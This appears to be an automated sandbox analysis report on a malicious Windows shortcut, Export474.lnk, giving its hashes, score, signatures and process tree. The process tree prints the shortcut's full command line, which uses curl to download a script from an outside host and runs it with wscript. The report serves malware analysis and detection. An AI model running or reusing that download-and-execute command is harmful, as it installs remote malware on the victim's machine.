Analysis
-
max time kernel
1612s -
max time network
1616s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
08-09-2022 20:37
General
-
Target
Export474.lnk
-
Size
2KB
-
MD5
e3bd2b8ab3b2aa72f21d6b1aea8dd4e0
-
SHA1
279b748f40cc8377d63b630c756c60644e9be89e
-
SHA256
77fe3b85503872e252ee98f49c1491d7dfc7cb3579ff3771bd7ad59f68c0dc60
-
SHA512
6aea0405c1eb507611c9ee21ac0ba0b8c2a719653ee1b644e015608ee5d3dae6a706f9b328b26ff3961cd7b690a9dfe1e6f6e30405d78c11efa08711f59b55cb
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Export474.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /q /c echo 'HI_U' && MD "C:\Users\Admin\AppData\Local\ur\B4O" && curl.exe --output C:\Users\Admin\AppData\Local\ur\B4O\enhrP.s_1L.QH0w.js https://purepowerinc.net/nluGZ/082.html && cd "C:\Users\Admin\AppData\Local\ur\B4O" && wscript enhrP.s_1L.QH0w.js && echo "Nj"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1056-54-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmpFilesize
8KB
-
memory/1720-88-0x0000000000000000-mapping.dmp